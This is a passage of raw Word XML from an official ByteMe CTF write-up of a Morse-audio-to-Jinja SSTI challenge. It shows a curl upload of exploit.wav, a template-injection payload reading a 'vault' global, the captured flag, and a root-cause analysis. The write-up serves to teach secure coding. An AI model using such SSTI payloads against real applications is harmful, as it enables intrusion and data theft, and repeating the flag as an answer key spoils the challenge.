        <w:t xml:space="preserve"> to the target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endpoint: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curl -X POST https://byteme-morse-audio-ssti.onrender.com/signal \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-F "audio=@exploit.wav"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Server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&lt;section class="result" aria-labelledby="result-title"&gt;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&lt;h2 id="result-title"&gt;Console output&lt;/h2&gt;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&lt;pre&gt;OWASP{m0rse_aud10_becomes_ssti}&lt;/pre&gt;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&lt;/section&gt;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console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4: Server Decoded Result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audio signal is decoded, parsed into the Jinja template expression, and rendered by the server engine to reveal the competition flag.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Solution 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Parameter | Value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Target Endpoint |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Audio Spec | Mono 16-bit PCM WAV, 8000 Hz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Morse Dot / Dash Unit | 0.065s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Injected Global | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vault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SSTI Payload | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{{ vault["archive"]["transmissions"][0]["metadata"]["decoded"]["payload"] }}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Flag | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP{m0rse_aud10_becomes_ssti}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Root Cause &amp; Vulnerability Explanation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Unsafe Template Evaluation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application takes user-controllable input from an untrusted audio upload and directly feeds it into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>render_template_string()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>. Dynamic template compilation should never be performed on unescaped or user-provided strings.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Global Namespace Exposure:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The sensitive competition secret was placed inside a dictionary exposed to the global Jinja execution environment (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app.jinja_env.globals["vault"] = vault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">), allowing legitimate template expressions to traverse object hierarchies without invoking blacklisted attributes like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>__class__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>config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Flawed Security Through Obscurity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Layering audio modulation (Morse code steganography) on top of an SSTI injection sink creates friction for automated scanners, but does not prevent determined exploitation once the decoding logic is reverse-engineered.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Tools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Python (`wave`, `struct`, `math`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Custom audio synthesis script to generate modulated Morse WAV signals.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cURL / Requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Sending multipart form data to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Audacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Visual waveform verification and timing inspection.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Timeline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Step | Action | Result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1 | Reconnaissance of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/archive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Identified 8 kHz WAV upload and restricted records notice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2 | Code analysis of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Discovered audio-to-Morse decoding feeding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>render_template_string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3 | Template filter audit | Identified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>jinja_env.globals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> bypassing blacklist keywords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4 | Signal synthesis | Synthesized </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exploit.wav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> using custom Python tone generator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5 | Submission | Uploaded payload to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/signal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and obtained </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP{m0rse_aud10_becomes_ssti}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">ByteMe CTF  •  Author: Pratik Jadhav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ByteMe CTF Writeups  |  Official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